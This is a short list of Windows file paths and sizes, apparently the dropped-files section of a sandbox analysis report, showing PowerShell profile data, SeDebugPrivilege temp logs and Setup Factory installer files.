    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log

      Filesize

      2KB

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log

      Filesize

      1KB

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log

      Filesize

      2KB

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

      Filesize

      2KB

    • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log

      Filesize

      2KB

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xf2dy0bm.wpo.ps1

      Filesize

      60B

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

      Filesize

      2KB

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

      Filesize

      4.9MB

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

      Filesize

      329KB

    • C:\Users\Admin\AppData\Local\Temp\_ir_tu2_temp_0\IRIMG2.JPG

      Filesize

      6KB

    • \??\c:\inst.ini

      Filesize

      2B
